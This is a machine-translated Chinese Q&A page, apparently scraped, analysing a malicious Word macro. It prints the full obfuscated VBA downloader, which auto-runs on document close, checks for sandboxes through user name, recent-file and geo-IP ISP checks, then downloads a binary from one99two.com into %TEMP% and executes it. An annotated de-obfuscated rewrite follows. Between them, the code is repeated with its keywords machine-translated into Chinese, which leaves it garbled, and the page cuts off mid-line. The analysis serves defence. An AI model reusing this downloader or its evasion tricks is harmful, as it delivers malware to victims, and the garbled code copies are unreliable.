这个恶意vba代码到底做了什么?_Vba_Ms Word - Fatal编程技术网

这个恶意vba代码到底做了什么?


我刚在我的工作场所收到这个基于宏的文档,其中包含恶意宏代码。
由于vb.net并不是我的强项,我无法确切地理解它的功能。 这是我在文档中能找到的唯一宏。
由于代码经过了严重混淆,我认为这是恶意的

' Auto-executing entry point: Word runs Document_Close when the document is
' closed, so the payload fires on exit rather than on open (an analyst who only
' looks for Document_Open / AutoOpen triggers would miss it).
Public Sub Document_Close()
' Any error raised below - including the deliberate Err.Raise in UWaFZ that
' every environment check uses - jumps to the empty SWuc label, so the sub
' ends with no dialog shown to the user.
On Error GoTo SWuc
' The actual downloader; see ZQZf.
ZQZf
Exit Sub
SWuc:
End Sub
' Downloader body. Every API name and string literal is rebuilt at run time by
' s(), and every COM call goes through CallByName, so the static text never
' contains "CreateObject", "WinHttp", "Exec" or a URL. The decoded values in
' the comments below are taken from the de-obfuscated listing further down
' this page. CallByName's third argument is the call type: 1 = vbMethod,
' 2 = vbGet (read a property), 4 = vbLet (assign a property).
Public Sub ZQZf()
Dim vmKT As String
Dim UwuV As String
' PUQqU = ThisDocument.Application
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2)
' Environment check 1: abort ("Bad username") if Application.UserName = "USER",
' a generic account name, presumably meant to spot analysis machines. UWaFZ
' raises an error that Document_Close's handler swallows, so the abort is silent.
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89))
' Environment check 2: abort ("Bad history") if RecentFiles.Count < 3, i.e.
' Word has almost no usage history, as on a freshly built VM.
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32))
' mVEL = CreateObject("WinHttp.WinHttpRequest.5.1")
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99))
' Environment check 3: synchronous GET https://www.maxmind.com/geoip/v2.1/city/me
' - looks up the geo/ISP record of the machine's own egress IP address.
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False
' SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452)
' SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
' - a fixed, dated browser UA; a usable proxy-log indicator when the client
' process is WINWORD.EXE.
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
' .Send
CallByName mVEL, s(11, "dneS", 11), 1
' Abort ("Can't locate IP address") if .Status >= 400.
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67))
' vmKT = .ResponseText (the geo-IP JSON)
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2)
' Abort ("Bad ISP: <name>") if the response mentions any of the hosting,
' cloud or security-vendor names returned by OImbM. This is sandbox evasion:
' a sample detonated from an egress IP owned by one of those organisations
' exits here and never fetches the payload.
For Each ofJE In OImbM
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE)
Next
' Stage 2: synchronous GET http://one99two.com/cgi/office16.bin (plain HTTP,
' same User-Agent), reusing the same request object.
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln   czdN0e Mrs0b", 221)
CallByName mVEL, s(11, "dneS", 11), 1
' Abort ("Can't download binary file") if .Status >= 400.
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo  nniitoaeddyawbf'lnl a", 249))
' zGFN = CreateObject("WScript.Shell").Environment("PROCESS")
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9))
' UwuV = %TEMP% & Application.PathSeparator & "tmp8213.tmp" - the drop path.
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37)
' wATB = CreateObject("ADODB.Stream")
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19))
' .Type = 1 (adTypeBinary); call type 4 = vbLet is a property assignment.
CallByName wATB, s(17, "yTep", 11), 4, 1
' .Open
CallByName wATB, s(27, "nepO", 11), 1
' .Write mVEL.ResponseBody (the raw bytes of the downloaded file)
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2)
' .SaveToFile UwuV, 2 (2 = adSaveCreateOverWrite)
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2
' .Close
CallByName wATB, s(8, "solCe", 14), 1
' CreateObject("WScript.Shell").Exec UwuV - runs the dropped binary. For
' detection: WinHttp, ADODB.Stream and WScript.Shell instantiated inside
' WINWORD.EXE, a file written to %TEMP%, and a new process whose parent would
' be Word.
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV
End Sub
' Returns the block list that ZQZf matches case-insensitively against the
' geo-IP response. Decoded (see the de-obfuscated listing below) the entries
' are cloud/hosting providers and generic data-centre words (AMAZON, CLOUD,
' DATA CENTER, DEDICATED, HOSTING, HETZNER, LEASEWEB, OVH SAS, MICROSOFT, ...)
' and security vendors (BITDEFENDER, BLUE COAT, CISCO SYSTEMS, ESET, FIREEYE,
' FORCEPOINT, FORTINET, PROOFPOINT, TREND MICRO, TRUSTWAVE, MIMECAST, ...).
' Any hit makes the sample bail out before the download, so a detonation from
' such a network never shows the second stage. rHOu is a pass-through that
' only hides the Array() literal from pattern matching.
Public Function OImbM()
OImbM = rHOu(Array(s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), s(101, "TSS SMIOYECCS", 139), _
s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), _
s(54, "IYREEFE", 9), s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), s(65, "SOHGNIT", 27), _
s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), _
s(13, "ESREVR", 29), s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), s(19, "RAIO RNHEATMC", 75), _
s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), s(11, "RTORCIMDNE", 99)))
End Function
' Abort helper: raises run-time error 2 with the supplied text as the
' description (no Source). Inside Document_Close that error is caught by the
' empty handler, so every environment check fails closed and silently.
Public Sub UWaFZ(ByVal ltfqE As String)
    Err.Raise 2, , ltfqE
End Sub
' COM factory wrapper: instantiates the object whose ProgID is DVnR. In the
' original the result took one more hop through the identity function feZmA,
' purely so that "CreateObject(" never sits next to a readable ProgID in the
' source; that hop is inlined here.
Public Function qizB(ByVal DVnR As String)
    Dim created As Object
    Set created = CreateObject(DVnR)
    Set qizB = created
End Function
' Identity pass-through for an object reference. It has no effect; it exists
' only to put one more call between CreateObject and the use of its result.
Public Function feZmA(ByVal jfcO As Object)
    Dim passthrough As Object
    Set passthrough = jfcO
    Set feZmA = passthrough
End Function
' Identity pass-through for a Variant (used by OImbM to wrap its Array()
' literal). Returns its argument unchanged.
Public Function rHOu(ByVal iMqIc)
    Dim passthrough As Variant
    passthrough = iMqIc
    rHOu = passthrough
End Function
' String de-obfuscator used for every literal in this module. Sfrf holds the
' wanted string with its characters shuffled; DDniC is the starting index and
' QuJk the stride. Starting at DDniC mod Len(Sfrf) it reads one character,
' advances by QuJk (mod Len), and repeats until Len(Sfrf) characters have
' been collected, e.g. s(27, "nepO", 11) = "Open". An empty Sfrf raises
' division-by-zero, as in the original. The GzSvR (remainder) and gOtmH
' (character pick) helpers are inlined here.
Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String
    Dim span As Integer
    Dim cursor As Integer
    Dim decoded As String
    span = Len(Sfrf)
    cursor = DDniC Mod span
    Do Until Len(decoded) = span
        decoded = decoded & Mid$(Sfrf, cursor + 1, 1)
        cursor = (cursor + QuJk) Mod span
    Loop
    s = decoded
End Function
' Returns the single character at zero-based position qnJn of vdHA (s() uses
' it to pick characters out of a shuffled literal). Kept as Right(Left(...))
' rather than Mid so that an index past the end yields the last character,
' not an empty string, exactly like the original.
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String
    Dim prefix As String
    prefix = Left$(vdHA, qnJn + 1)
    gOtmH = Right$(prefix, 1)
End Function
' Integer remainder. The original spells it JtMKn - PfnR * (JtMKn \ PfnR),
' which with VBA's truncating integer division is exactly JtMKn Mod PfnR
' (same sign rule: the result takes the sign of JtMKn); the obfuscator merely
' avoided the Mod keyword. Raises division-by-zero when PfnR = 0.
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer
    GzSvR = JtMKn Mod PfnR
End Function
公共子文档\u Close()
关于错误转到SWuc
ZQZf
出口接头
SWuc:
端接头
公共分公司ZQZf()
作为字符串的Dim vmKT
将UwuV设置为字符串
设置PUQqU=CallByName(此文档,s(61,“Pocpiatlna”,107),2)
如果CallByName(PUQqU,s(74,“mrUaeeNs”,29),2)=s(31,“RESU”,35),那么UWaFZ(s(40,“uadrBsm naee”,89))
如果CallByName(CallByName(PUQqU,s(41,“liFtneceRse”,109),2),s(33,“tonCu”,8),2)小于3,则UWaFZ(s(72,“sih daByrot”,32))
设置mVEL=qizB(s(271,“5n.tq.IPHEWTNRS1TIPE.HWtu”,99))
CallByName mVEL,s(27,“nepO”,11),1,s(28,“EGT”,8),s(414,“m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn”,151),假
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(62,“eeerrfR”,52),s(399,“arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn”,452)
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(15,“AetgrUe sn”,53),s(635,“0.0T/61nIplt6WMoieT;;(oi.l0)Tw1i5;.dEaa/.iSmln czdN0e Mrs0b”,221)
CallByName mVEL,s(11,“dneS”,11),1
如果CallByName(mVEL,s(13,“tSsuta”,11),2)>=400,则UWaFZ(s(29,“PnIa Cestsaecrodld at”,67))
vmKT=CallByName(mVEL,s(115,“esnopseRtxeT”,71),2)
对于OImbM中的每个JE
如果仪器(LCase(vmKT),LCase(ofJE))为0,则UWaFZ(s(67,“daB:PSI”,23)和ofJE)
下一个
CallByName mVEL,s(27,“nepO”,11),1,s(28,“EGT”,8),s(237,“pnwm/CBTOTOOII.t/9cgf6h/9.cf1n:eo/oei”,101),假
CallByName mVEL,s(97,“qSeueaetdsReterH”,35),1,s(15,“AetgrUe sn”,53),s(635,“0.0T/61nIplt6WMoieT;;(oi.l0)Tw1i5;.dEaa/.iSmln czdN0e Mrs0b”,221)
CallByName mVEL,s(11,“dneS”,11),1
如果CallByName(mVEL,s(13,“tSsuta”,11),2)>=400,则UWaFZ(s(261,“rCo nniitoaeddyawbf'lnl a”,249))
设置zGFN=CallByName(qizB(s(108,“lpltW.SSchrei”,41)),s(97,“nemnorivnEt”,43),2,s(17,“示波器”,9))
UwuV=zGFN(s(23,“PMET”,7))和CallByName(PUQqU,s(74,“arapestaprot”,77),2)和s(46,“1tt83mm2.pp”,37)
设置wATB=qizB(s(128,“BmSDrDa.AtOe”,19))
CallByName wATB,s(17,“yTep”,11),4,1
CallByName wATB,s(27,“nepO”,11),1
CallByName wATB,s(41,“rWeti”,29),1,CallByName(mVEL,s(32,“BesyooseRndp”,101),2)
CallByName wATB,s(35,“olaTiSeFev”,37),1,UwuV,2
CallByName wATB,s(8,“solCe”,14),1
呼叫人姓名qizB(s(108,“lpltW.SSchrei”,41)),s(31,“cexE”,7),1,UwuV
端接头
公共职能OImbM()
OImbM=rHOu(数组(s(7,“MANOZA”,29),s(71,“OYOSNNMUA”,59),s(60,“Dtnibfreed”,86),s(11,“ULBTAOC E”,26),s(101,“TSS smoyeccs”,139)_
s(41,“OCULD”,7),s(83,“EC ATADRETN”,109),s(15,“ECATADRETN”,69),s(107,“ARETENADTC”,93),s(47,“EADCDIEDT”,34),s(99,“P,SO ELSTE”,93)_
s(54,“IYREEFE”,9),s(17,“TRPNOEIFCO”,27),s(66,“ROFTENIT”,31),s(71,“EHRENZT”,69),s(16,“ETSOHD”,59),s(65,“SOHGNIT”,27)_
s(22,“ABEEESLW”,77),s(85,“COISMOTRF”,61),s(23,“ECROFN”,35),s(12,“SSV AOH”,74),s(95,“PNRFIPOOTO”,37),s(41,“ISUTERYC”,51)_
s(13,“ESREVR”,29),s(205,“HOGETL SNNICROTSOGE”,46),s(89,“RTEDMCORN I”,17),s(15,“AWTSURTEV”,62),s(19,“RAIO RNHEATMC”,75)_
s(44,“Auorclpkebmctaso”,80),s(25,“AMESICTM”,59),s(11,“RTORCIMDNE”,99)))
端函数
公共子UWaFZ(ByVal ltfqE作为字符串)
错误。提升编号:=2,说明:=ltfqE
端接头
公共函数qizB(ByVal DVnR作为字符串)
设置qizB=feZmA(CreateObject(DVnR))
端函数
公共函数feZmA(ByVal jfcO作为对象)
设置feZmA=jfcO
端函数
公共职能rHOu(ByVal iMqIc)
rHOu=iMqIc
端函数
公共函数s(ByVal DDniC为整数,ByVal Sfrf为字符串,ByVal QuJk为整数)为字符串
作为整数的Dim qnJn
qnJn=GzSvR(DDniC,Len(Sfrf))
当镜头<镜头(Sfrf)
s=s&gOtmH(Sfrf,qnJn)
qnJn=GzSvR((qnJn+qjk),Len(Sfrf))
环
端函数
公共函数gOtmH(ByVal vdHA作为字符串,ByVal qnJn作为整数)作为字符串
gOtmH=右(左(vdHA,qnJn+1),1)
端函数
公共函数GzSvR(ByVal JtMKn为整数,ByVal PfnR为整数)为整数
GzSvR=JtMKn-(PfnR*(JtMKn\PfnR))
端函数

警告:不要运行此代码(也不要运行提问者贴出的原始代码)

这是一个二进制文件下载器,至少 VBA 这一侧是脚本小子级别的代码。我对它做了去混淆、替换掉那些被打乱的名称并内联了一些函数调用之后,它看起来是这样的:

' Document_Close trigger: fires when the user closes the document. The empty
' QuietExit handler swallows every Err.Raise in MaliciousCode, which is how
' each environment check aborts without showing a dialog.
Public Sub Document_Close()
    On Error GoTo QuietExit
    MaliciousCode
    Exit Sub
QuietExit:
End Sub

' Analyst's re-write of ZQZf with names restored and the s()/CallByName
' indirection inlined. It is an explanatory transcript, not a runnable
' sample: the first statement raises an error on purpose, and a few details
' differ from the original (noted inline).
Public Sub MaliciousCode()
    Err.Raise 666, , "Do not execute this."  'NOTE: I added this ;-)

    Dim response As String
    Dim filePath As String

    Set wdApp = ThisDocument.Application
    ' Environment checks: a generic user name or an almost-empty recent-files
    ' list suggests an analysis VM rather than a real workstation.
    ' (Transcription note: with positional arguments the text here lands in
    ' Err.Source; the original passes it as Description:=.)
    If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username"
    If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history"

    ' Stage 1: look up the geo/ISP record of this machine's own public IP.
    Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
    webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
    ' Fixed, dated browser UA sent from Word - a usable proxy-log indicator.
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address"

    ' Sandbox evasion: bail out if the ISP/organisation named in the response
    ' is a cloud host or security vendor (see GetBadISPList).
    response = webRequest.ResponseText
    For Each isp In GetBadISPList
        If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp
    Next

    ' Stage 2: fetch the executable payload over plain HTTP with the same UA.
    webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
    webRequest.Send

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file"

    ' Drop the bytes to %TEMP%\tmp8213.tmp through an ADODB.Stream, then run it.
    Set env = CreateObject("WScript.Shell").Environment("PROCESS")
    filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp"
    Set outStream = CreateObject("ADODB.Stream")
    ' adTypeBinary is the ADO constant 1; the original assigns 1 directly.
    outStream.Type = adTypeBinary
    outStream.Open
    outStream.Write webRequest.ResponseBody
    ' Transcription note: the original passes the path and an overwrite flag
    ' (UwuV, 2) to SaveToFile; they were dropped here.
    outStream.SaveToFile
    outStream.Close

    ' Detection: a new process started from %TEMP% whose parent is WINWORD.EXE.
    CreateObject("WScript.Shell").Exec filePath
End Sub

' Decoded form of OImbM: the block list MaliciousCode matches (case-
' insensitively) against the geo-IP JSON. Two families: hosting/cloud
' providers and generic data-centre words, and security vendors. A match means
' the sample assumes it is running inside a sandbox or vendor network and
' exits silently - so when detonating from such an address range the payload
' stage is never observed.
Public Function GetBadISPList()
    GetBadISPList = Array("AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", "CISCO SYSTEMS", _
                       "CLOUD", "DATA CENTER", "DATACENTER", "DATACENTRE", "DEDICATED", "ESET, SPOL", _
                       "FIREEYE", "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", "HOSTING", _
                       "LEASEWEB", "MICROSOFT", "NFORCE", "OVH SAS", "PROOFPOINT", "SECURITY", _
                       "SERVER", "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _
                       "BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO")
End Function
公共子文档\u Close()
错误时转到QuietExit
恶意代码
出口接头
QuietExit:
端接头
公共子恶意代码()
错误。Raise 666,“不要执行此操作。”“注意:我添加了此;-)
作为字符串的暗淡响应
将文件路径设置为字符串
Set wdApp=ThisDocument.Application
如果wdApp.UserName=“USER”,则错误提示2,“错误用户名”
如果wdApp.RecentFiles.Count<3,则错误提升2,“错误历史记录”
设置webRequest=CreateObject(“WinHttp.WinHttpRequest.5.1”)
webRequest。打开“获取”https://www.maxmind.com/geoip/v2.1/city/me”“错
webRequest.SetRequestHeader“Referer”https://www.maxmind.com/en/locate-my-ip-address"
webRequest.SetRequestHeader“用户代理”、“Mozilla/5.0(兼容;MSIE 10.0;Windows NT 6.1;Trident/6.0)”
webRequest.Send
如果webRequest.Status>=400,则错误提示2,“找不到IP地址”
response=webRequest.ResponseText
对于GetBadISPList中的每个isp
如果InStr(LCase(response)、LCase(isp))为0,则错误提示2,“坏isp:&isp
下一个
webRequest。打开“获取”http://one99two.com/cgi/office16.bin”“错
webRequest.SetRequestHeader“用户代理”、“Mozilla/5.0(兼容;MSIE 10.0;Windows NT 6.1;Trident/6.0)”
webRequest.Send
如果webRequest.Status>=400,则错误提示2,“无法下载二进制文件”
Set env=CreateObject(“WScript.Shell”).Environment(“进程”)
filePath=env(“TEMP”)&wdApp.PathSeparator&“tmp8213.tmp”
设置超出流=Cr